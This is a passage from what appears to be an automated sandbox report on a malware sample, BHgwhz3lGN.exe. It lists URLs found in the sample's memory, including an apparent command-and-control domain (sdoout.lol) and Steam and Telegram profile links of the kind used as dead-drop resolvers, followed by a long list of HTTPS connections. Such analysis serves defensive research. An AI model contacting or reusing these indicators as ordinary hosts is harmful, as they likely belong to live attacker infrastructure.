              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
              Source: Cookies.11.drString found in binary or memory: https://msn.comXID/
              Source: Cookies.11.drString found in binary or memory: https://msn.comXIDv10
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://music.amazon.com
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://music.apple.com
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://music.yandex.com
              Source: 2cc80dabc69f58b6_1.10.drString found in binary or memory: https://ntp.msn.cn/edge/ntp
              Source: 000003.log6.10.drString found in binary or memory: https://ntp.msn.com
              Source: 000003.log0.10.dr, 000003.log3.10.drString found in binary or memory: https://ntp.msn.com/
              Source: 000003.log0.10.drString found in binary or memory: https://ntp.msn.com/0
              Source: QuotaManager.10.drString found in binary or memory: https://ntp.msn.com/_default
              Source: 000003.log0.10.dr, 2cc80dabc69f58b6_1.10.drString found in binary or memory: https://ntp.msn.com/edge/ntp
              Source: 2cc80dabc69f58b6_1.10.drString found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
              Source: Session_13380044131592668.10.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
              Source: QuotaManager.10.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
              Source: 2cc80dabc69f58b6_0.10.drString found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://open.spotify.com
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://outlook.live.com/mail/0/
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://outlook.office.com/mail/0/
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
              Source: chromecache_519.5.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
              Source: chromecache_516.5.drString found in binary or memory: https://plus.google.com
              Source: chromecache_516.5.drString found in binary or memory: https://plus.googleapis.com
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
              Source: 2cc80dabc69f58b6_1.10.drString found in binary or memory: https://sb.scorecardresearch.com/
              Source: BHgwhz3lGN.exe, 00000000.00000002.2561519655.00000000004CC000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000003.1470034888.00000000004E4000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000003.1497511197.00000000004E3000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000003.1456510564.00000000004E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdoout.lol
              Source: BHgwhz3lGN.exe, 00000000.00000003.1456510564.00000000004E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdoout.lol/
              Source: BHgwhz3lGN.exe, 00000000.00000003.1443228945.00000000004E1000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000003.1470034888.00000000004E4000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000003.1456510564.00000000004E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdoout.lol/2
              Source: BHgwhz3lGN.exe, 00000000.00000003.1483165863.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000003.1470034888.00000000004E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdoout.lol/6
              Source: BHgwhz3lGN.exe, 00000000.00000003.1522441957.00000000004E1000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000003.1497511197.00000000004E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdoout.lol/:Y
              Source: BHgwhz3lGN.exe, 00000000.00000003.1443228945.00000000004E1000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000003.1483165863.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdoout.lol/D
              Source: BHgwhz3lGN.exe, 00000000.00000003.1443228945.00000000004E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdoout.lol/FY
              Source: BHgwhz3lGN.exe, 00000000.00000003.1483165863.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdoout.lol/J
              Source: BHgwhz3lGN.exe, 00000000.00000003.1470034888.00000000004E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdoout.lol/RY
              Source: BHgwhz3lGN.exe, 00000000.00000003.1443228945.00000000004E1000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000003.1522441957.00000000004E1000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000003.1483165863.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000002.2561519655.00000000004CC000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000003.1470034888.00000000004E4000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000003.1497511197.00000000004E3000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000003.1456510564.00000000004E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdoout.lol/X
              Source: BHgwhz3lGN.exe, 00000000.00000003.1522441957.00000000004E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdoout.lol/pc
              Source: BHgwhz3lGN.exe, 00000000.00000003.1443228945.00000000004E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdoout.lol/z
              Source: BHgwhz3lGN.exe, 00000000.00000003.1443228945.00000000004E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdoout.lolBY
              Source: BHgwhz3lGN.exe, 00000000.00000003.1443228945.00000000004E1000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000003.1456510564.00000000004E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdoout.lolRY
              Source: BHgwhz3lGN.exe, 00000000.00000003.1522441957.00000000004E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdoout.lolX
              Source: BHgwhz3lGN.exe, 00000000.00000003.1522441957.00000000004E1000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000002.2561519655.00000000004CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdoout.lold
              Source: BHgwhz3lGN.exe, 00000000.00000003.1443228945.00000000004E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdoout.lolfY-
              Source: BHgwhz3lGN.exe, 00000000.00000003.1522441957.00000000004E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdoout.lolp
              Source: BHgwhz3lGN.exe, 00000000.00000003.1522441957.00000000004E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdoout.lolro
              Source: BHgwhz3lGN.exe, 00000000.00000003.1522441957.00000000004E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdoout.lolu
              Source: BHgwhz3lGN.exe, 00000000.00000003.1522441957.00000000004E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdoout.lolzo
              Source: 2cc80dabc69f58b6_1.10.drString found in binary or memory: https://srtb.msn.cn/
              Source: 2cc80dabc69f58b6_1.10.drString found in binary or memory: https://srtb.msn.com/
              Source: BHgwhz3lGN.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199811540174
              Source: BHgwhz3lGN.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199811540174hu76faMozilla/5.0
              Source: BHgwhz3lGN.exe, 00000000.00000002.2565375779.0000000003BEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: BHgwhz3lGN.exe, 00000000.00000002.2565375779.0000000003BEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: BHgwhz3lGN.exe, 00000000.00000002.2561519655.000000000046E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
              Source: BHgwhz3lGN.exeString found in binary or memory: https://t.me/w211et
              Source: BHgwhz3lGN.exe, 00000000.00000002.2561519655.00000000004B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/w211et0
              Source: BHgwhz3lGN.exeString found in binary or memory: https://t.me/w211ethu76faMozilla/5.0
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://tidal.com/
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://twitter.com/
              Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.10.drString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
              Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.10.drString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
              Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.10.drString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://vibe.naver.com/today
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
              Source: BHgwhz3lGN.exe, 00000000.00000003.1426750216.00000000004E4000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000002.2561519655.00000000004CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://web.telegram.org/
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://web.whatsapp.com
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
              Source: chromecache_516.5.drString found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
              Source: BHgwhz3lGN.exe, 00000000.00000002.2563122466.000000000331F000.00000004.00000020.00020000.00000000.sdmp, ectjmg.0.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://www.deezer.com/
              Source: BHgwhz3lGN.exe, 00000000.00000002.2563122466.0000000003362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: content.js.10.dr, content_new.js.10.drString found in binary or memory: https://www.google.com/chrome
              Source: BHgwhz3lGN.exe, 00000000.00000002.2563696536.0000000003732000.00000004.00000020.00020000.00000000.sdmp, BHgwhz3lGN.exe, 00000000.00000002.2563122466.0000000003362000.00000004.00000020.00020000.00000000.sdmp, mgd2v3.0.dr, Web Data.10.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: c5f29bf0-b74e-48bc-a110-aca9fb24b53f.tmp.11.drString found in binary or memory: https://www.googleapis.com
              Source: chromecache_516.5.drString found in binary or memory: https://www.googleapis.com/auth/plus.me
              Source: chromecache_516.5.drString found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
              Source: chromecache_519.5.drString found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
              Source: chromecache_519.5.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
              Source: chromecache_519.5.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://www.iheart.com/podcast/
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://www.instagram.com
              Source: BHgwhz3lGN.exe, 00000000.00000002.2563122466.000000000331F000.00000004.00000020.00020000.00000000.sdmp, ectjmg.0.drString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://www.last.fm/
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://www.messenger.com
              Source: BHgwhz3lGN.exe, 00000000.00000002.2565375779.0000000003BEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
              Source: BHgwhz3lGN.exe, 00000000.00000002.2565375779.0000000003BEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
              Source: BHgwhz3lGN.exe, 00000000.00000002.2565375779.0000000003BEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: BHgwhz3lGN.exe, 00000000.00000002.2565375779.0000000003BEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: BHgwhz3lGN.exe, 00000000.00000002.2565375779.0000000003BEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: BHgwhz3lGN.exe, 00000000.00000002.2565375779.0000000003BEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: 2cc80dabc69f58b6_1.10.drString found in binary or memory: https://www.msn.com/web-notification-icon-light.png
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://www.office.com
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://www.tiktok.com/
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://www.youtube.com
              Source: bff319f0-bad0-4527-81c9-a8a4b42aafd1.tmp.10.drString found in binary or memory: https://y.music.163.com/m/
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53982 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54006 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53976 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 54029 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53930 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 53884 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53993 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53935 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54012 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53987 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53903
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53902
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53901
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53900
              Source: unknownNetwork traffic detected: HTTP traffic on port 53900 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53998 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53905
              Source: unknownNetwork traffic detected: HTTP traffic on port 54001 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54018 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53942 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54030 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 53879 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53909
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53908
              Source: unknownNetwork traffic detected: HTTP traffic on port 53913 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53913
              Source: unknownNetwork traffic detected: HTTP traffic on port 53970 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53947 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53890 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53905 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54035 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53981 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 53975 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54041 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53889
              Source: unknownNetwork traffic detected: HTTP traffic on port 53992 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53884
              Source: unknownNetwork traffic detected: HTTP traffic on port 53868 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53883
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53882
              Source: unknownNetwork traffic detected: HTTP traffic on port 53902 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53881
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53888
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53887
              Source: unknownNetwork traffic detected: HTTP traffic on port 53934 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53891
              Source: unknownNetwork traffic detected: HTTP traffic on port 53986 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53890
              Source: unknownNetwork traffic detected: HTTP traffic on port 54013 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54025 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54042 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54019 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54002 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53997 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53899
              Source: unknownNetwork traffic detected: HTTP traffic on port 53980 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53898
              Source: unknownNetwork traffic detected: HTTP traffic on port 54036 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53952 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53946 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53891 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54020 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54014 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54037 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54008 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53991 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53974 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53968 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53901 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53979 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54031 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53985 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54003 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53848
              Source: unknownNetwork traffic detected: HTTP traffic on port 53887 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53847
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53968
              Source: unknownNetwork traffic detected: HTTP traffic on port 53996 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53961
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54015
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54014
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54013
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53965
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54019
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54018
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54017
              Source: unknownNetwork traffic detected: HTTP traffic on port 54032 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54022
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54021
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54020
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53979
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53978
              Source: unknownNetwork traffic detected: HTTP traffic on port 54044 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53977
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53972
              Source: unknownNetwork traffic detected: HTTP traffic on port 54015 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54027
              Source: unknownNetwork traffic detected: HTTP traffic on port 53903 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54026
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53970
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54025
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53976
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53975
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53974
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54029
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54028
              Source: unknownNetwork traffic detected: HTTP traffic on port 53899 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54030
              Source: unknownNetwork traffic detected: HTTP traffic on port 53847 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54034
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54033
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54032
              Source: unknownNetwork traffic detected: HTTP traffic on port 53881 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54031
              Source: unknownNetwork traffic detected: HTTP traffic on port 54026 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53990 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 54043 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53868
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53989
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53988
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54038
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53982
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54037
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53981
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54036
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53980
